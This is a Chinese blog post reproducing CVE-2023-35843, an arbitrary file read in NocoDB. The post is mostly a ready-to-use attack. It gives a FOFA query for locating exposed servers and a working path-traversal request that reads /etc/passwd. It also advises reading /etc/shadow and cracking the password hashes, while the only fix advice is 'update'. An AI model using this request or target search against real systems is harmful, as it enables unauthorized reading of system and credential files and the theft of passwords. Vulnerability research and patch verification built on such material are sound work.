漏洞复现(CVE-2023-35843)

最新推荐文章于 2024-02-18 12:38:13 发布
最新推荐文章于 2024-02-18 12:38:13 发布
阅读量204 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 网络安全 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80127209/article/details/133815641
版权

目录

免责声明:

一:漏洞描述

二:漏洞影响版本

三:网络空间测绘查询

四:漏洞复现

五:漏洞利用

六:修复建议

免责声明:

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行承担!

一:漏洞描述

NocoDB 是 Airtable 的开源替代方案,可以“一键”将 MySQL、PostgreSQL、SQL Server、SQLite 和 MariaDB 转换为智能电子表格。此软件存在任意文件读取漏洞。

二:漏洞影响版本

version<=0.106.1

三:网络空间测绘查询

fofa:
icon_hash="-2017596142"

图片

四:漏洞复现

poc

GET /download/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1

图片

图片

五:漏洞利用

可通过读取/etc/shadow读取到加密后的用户名密码,解密后进行后续测试工作

六:修复建议

及时更新至最新版本

原文地址: https://www.freebuf.com/articles/web/379844.html

声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权

                                            @学习更多渗透技能!体验靶场实战练习

运维Z叔
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2023-35843:NocoDB任意文件读取漏洞复现
薛定谔嘚喵博客
09-07 670
NocoDB是一个开源 Airtable 替代品。将任何 MySql、PostgreSql、Sql Server、Sqlite 和 MariaDb 转换为智能电子表格。NocoDB 0.106.0版本及之前版本存在安全漏洞。攻击者利用该漏洞可以访问服务器上的任意文件。
[ vulhub漏洞复现篇 ] WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839)
qq_51577576的博客
03-12 1672
[ vulhub漏洞复现篇 ] WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839) WebLogic是美商Oracle的主要产品之一,系购并得来。是商业市场上主要的Java应用服务器软件之一,是世界上第一个成功商业化的J2EE应用服务器,目前已推出到14c版。而此产品也延伸出WebLogic Portal, WebLogic Integration等企业用的中间件,以及OEPE开发工具。
CVE-2023-35843NocoDB 任意文件读取漏洞(CVE-2023-35843
m0_46317063的博客
06-29 629
cve-2023-35843
CVE-2023-35843】NocoDB 任意文件读取漏洞
CommputerMac的博客
10-07 470
NocoDB 是 Airtable 的开源替代方案,可以“一键”将 MySQL、PostgreSQL、SQL Server、SQLite 和 MariaDB 转换为智能电子表格。此软件存在任意文件读取漏洞
CVE-2023-50164 Apache Struts2漏洞复现
黑剑
12-15 3447
从本质上讲,该漏洞允许攻击者利用 Apache Struts 文件上传系统中的缺陷。它允许他们操纵文件上传参数并执行路径遍历。这种利用可能会导致在服务器上执行任意代码,从而导致各种后果,例如未经授权的数据访问、系统受损,甚至完全控制受影响的系统,包括在系统中放置恶意文件。仔细一看,CVE-2023-50164涉及Apache Struts的文件上传机制中的一个漏洞。对于非技术受众,想象一下这样一个场景:安全检查点(文件上传机制)由于漏洞而被绕过,从而允许未经授权的访问安全区域(服务器)。
CVE-2023-28432 MiniO信息泄露漏洞复现
Love&Share
04-28 6155
MiniO 是一个基于 Apache License v2.0 开源协议的对象存储服务。它兼容亚马逊 S3 云存储服务接口,非常适合于存储大容量非结构化的数据,例如图片、视频、日志文件、备份数据和容器/虚拟机镜像等在集群部署的 Minio 中,未授权的攻击者可发送恶意的 HTTP 请求来获取 Minio 环境变量中的敏感信息(MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD),可能导致攻击者以管理员权限登录 Minio,分布式部署的所有用户都会受到影响,单机用户没有影响。
CVE-2023-21839漏洞复现
qq_34914659的博客
02-28 4081
CVE-2023-21839漏洞复现
漏洞复现-CVE-2010-2883
滕财然的博客
02-26 1495
CVE-2010-2883 Adobe Reader复现 1、漏洞原理 Adobe Reader 8.24-9.3.4的CoolType.dll库在解析字体文件SING表格中的uniqueName项时存在栈溢出漏洞,用户打开了特制的PDF文件可能导致执行恶意代码,可实现比如进行远程控制等。 2、漏洞分析 反汇编工具IDA: IDA 是全球最智能、功能最完善的交互式反汇编程序,许多软件安全专家和黑客...
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
【全网首篇】Copyparty 路径遍历漏洞 CVE-2023-37474 漏洞分析
最新发布
Liyu_6618的博客
02-18 637
【全网首篇】Copyparty 路径遍历漏洞 CVE-2023-37474 漏洞分析
漏洞复现】OpenSSH ProxyCommand命令注入漏洞CVE-2023-51385)
做自己喜欢的事,并将其发挥到极致!
12-27 4960
OpenSSH 是 SSH(Secure SHell)协议的免费开源实现。SSH协议族可以用来进行远程控制, 或在计算机之间传送文件。而实现此功能的传统方式,如telnet(终端仿真协议)、 rcp ftp、 rlogin、rsh都是极为不安全的,并且会使用明文传送密码。OpenSSH提供了服务端后台程序和客户端工具,用来加密远程控制和文件传输过程中的数据,并由此来代替原来的类似服务。一个存在于OpenSSH中的命令注入漏洞,攻击者可利用该漏洞注入恶意Shell字符导致命令注入。
从零复现--NocoDB任意文件读取(CVE-2023-35843)
weixin_44632654的博客
10-16 771
NocoDB目前适用于MySQL、PostgreSQL、Microsoft、SQLServer、SQLite、Amazon Aurora 和 MariaDB 数据库。免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!NocoDB存在路径遍历漏洞,未经身份验证的攻击者可以通过操纵/download路由的路径参数来访问服务器上的任意文件。
Goby漏洞更新 | Altenergy Power System Control Software set_timezone 远程命令执行漏洞CVE-2023-28343)
m0_46699477的博客
03-21 672
Altenergy Power System Control Software set_timezone 远程命令执行漏洞CVE-2023-28343)
CVE-2023-51385 OpenSSH ProxyCommand命令注入漏洞
mirocky的博客
01-09 3032
ssh_config文件中的ProxyCommand、LocalCommand指令或"match exec"谓词通过%u、%h或类似的扩展标记引用用户或主机名时,可能会导致命令注入的风险。在Git中,用户或主机名中的shell元字符未被禁止(如在主机名中进行命令拼接),这可能导致存储库包含一个带有shell元字符的子模块用户或主机名。这种情况可能引发命令注入漏洞
CVE-2023-38831漏洞复现过程(Winrar漏洞
weixin_47948655的博客
10-08 361
CVE-2023-38831漏洞复现过程(Winrar漏洞
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8425
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
wpvuldemo漏洞复现
09-09
wpvuldemo是一个用于演示WordPress漏洞的工具。要复现漏洞,首先需要在本地搭建一个WordPress网站。 1. 安装环境:需要在本地环境中设置好PHP、MySQL和Web服务器(如Apache)。 2. 下载WordPress:前往WordPress官方网站,下载最新版本的WordPress。 3. 解压并配置:解压WordPress压缩包,并将其文件拷贝到Web服务器的根目录下。然后创建一个MySQL数据库,并将数据库的连接信息(用户名、密码、数据库名称)记录下来。 4. 安装WordPress:在浏览器中输入服务器地址,按照向导的指引进行WordPress的安装。在其中,需要输入之前创建的MySQL数据库的连接信息。 5. 网站设置:完成安装后,登录WordPress后台,进入“设置”选项,根据需求进行网站的基本设置,如网站标题、描述、主题等。 6. 下载wpvuldemo:从Github上下载wpvuldemo的源代码,并将其文件拷贝到WordPress网站的根目录下。 7. 执行漏洞复现:在浏览器中输入服务器地址,加上wpvuldemo的相关路径,访问对应的漏洞复现页面。 8. 检查结果:如果复现成功,会在页面上显示相关漏洞的信息和可能的攻击方式。 需要注意的是,漏洞复现过程中应遵循合法合规的原则,仅在自己本地环境中进行,不得用于非法用途。完成漏洞复现后,应及时升级修复漏洞或采取相应的安全措施来保护网站。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值